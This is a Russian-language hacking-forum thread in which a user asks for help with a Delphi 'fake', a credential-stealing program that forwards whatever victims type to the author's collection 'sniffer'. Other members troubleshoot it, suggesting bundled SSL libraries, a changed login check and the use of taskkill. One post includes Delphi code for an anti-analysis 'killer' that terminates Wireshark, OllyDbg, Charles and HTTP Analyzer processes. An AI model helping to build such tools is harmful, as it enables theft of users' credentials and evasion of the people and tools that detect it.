delphi xe3 проблемы с программами

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by DJ_TWIX, 13 Feb 2014.

  1. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Всем привет
    есть фейк, который с валидацией
    когда у себя на компе я запускаю то валидация работает, "неправильный пароль" пишет и на сниффер не отсылает
    а когда любой пользователь скачивает, то у него все подряд пишеь "авторизовались" и шлет весь бред на сниффер

    чем обьяснить что валидация на других компах не пашет?
     
    #1 DJ_TWIX, 13 Feb 2014
  2. qw1mb1

    qw1mb1 Member

    Joined:
    8 Feb 2013
    Messages:
    113
    Likes Received:
    16
    Reputations:
    8
    без кода разобраться очень непросто, экстрасенсы все уже вымерли давно, но все же попробую прикинуться вангой. валидация работает через SSL? если да, то вместе с самим фейком надо распространять файлы библиотек SSL, версия которых на компе жертвы может отличаться от твоих. необходимы следующие файлы:
    libeay32.dll
    libssl32.dll
    ssleay32.dll
    искать их надо в системных папках винды (system32)
     
    #2 qw1mb1, 13 Feb 2014
  3. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    у меня в этой папке нет файлов таких
     
    #3 DJ_TWIX, 13 Feb 2014
    Last edited: 13 Feb 2014
  4. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    эти 3 файла нашел в папке с проектом
    заархивировал все,проверил на виртуалке ничего не поменялось

    вот код

     
    #4 DJ_TWIX, 14 Feb 2014
  5. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Логично предположить, что
    отрабатывает неверно, предлагаю сменить алгоритм проверки "залогениности", это должно решить проблему
     
    #5 #colorblind, 14 Feb 2014
  6. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    кто знает на что поменять?
     
    #6 DJ_TWIX, 14 Feb 2014
  7. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    ого,я и не думал что обычный фейк будет так сложно сделать
     
    #7 DJ_TWIX, 15 Feb 2014
  8. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Именно поэтому все прикладные делфекодеры пишут на православном delphi 7, а не на богомерзком xe
    Курите ветку http://forum.sources.ru/index.php?showtopic=306145
     
    #8 #colorblind, 15 Feb 2014
  9. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    подскажите у кого есть этот киллер снифферов?
    http://i33.fastpic.ru/big/2014/0214/7f/282d9046193ec23b86bfd735ba94e27f.png
     
    #9 DJ_TWIX, 15 Feb 2014
  10. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    мне сказали что делфи не читает чтото из кода
    (вот полный код,у меня остаются 3 ошибки (см скрин) которые не убираются)

    Code:
    shellapi, tlhelp32






function kill(exefilename: string): Integer;
const
PROCESS_TERMINATE= $0001;
var
continueloop:BOOL;
fsnapshothandle:THandle;
FprocessEntry32:TProcessEntry32;
begin
result:=0;
fsnapshothandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
fprocessentry32.dwSize:=SizeOf(processentry32);
Continueloop:=Process32First(fsnapshothandle, fprocessentry32);
while Integer(continueloop)<>0 do
begin
if (UpperCase(ExtractFileName(fprocessentry32.szExeFile)=UpperCase(exefilename))) then
 result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, bool(0),
 fprocessentry32.th32ProcessID), 0));
 continueloop := Process32Next(fsnapshothandle, fprocessentry32);
 end;
 CloseHandle(fsnapshothandle);
 end;
end;





begin
Kill('miniperl.exe');
Kill('httpd.exe');
Kill('mysqld.exe');
Kill('ollydbg.exe');
Kill('httpanalyzerstdv7.exe');
Kill('httpanalyzerstdv6.exe');
Kill('httpanalyzerstdv5.exe');
Kill('charles.exe');
Kill('wireshark.exe');
wnd:=FindWindow(nill, 'HTTP Analyzer V6');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
wnd:=FindWindow(nill, 'HTTP Analyzer V5');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
wnd:=FindWindow(nill, 'HTTP Analyzer V7');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
wnd:=FindWindow(nill, 'ollydbg');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
wnd:=FindWindow(nill, 'Charles 3.6');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
wnd:=FindWindow(nill, 'httpd.exe -w');
if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
end;
     
    #10 DJ_TWIX, 15 Feb 2014
  11. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Какой-то не правильный киллер. Гораздо эффективнее было бы через ShellExecute вызывать taskkill /f /im. Хотя бы по той простой причине, что это не требует отладочных привилегий, отработает быстрее и кода компактней
     
    #11 #colorblind, 15 Feb 2014
(You must log in or sign up to post here.)
Loading...
Similar Threads - delphi проблемы программами
  1. Peja

    Программа написана на C++

    Peja, 18 Jan 2023, in forum: С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
    Replies:
    0
    Views:
    2,538
    Peja
    18 Jan 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.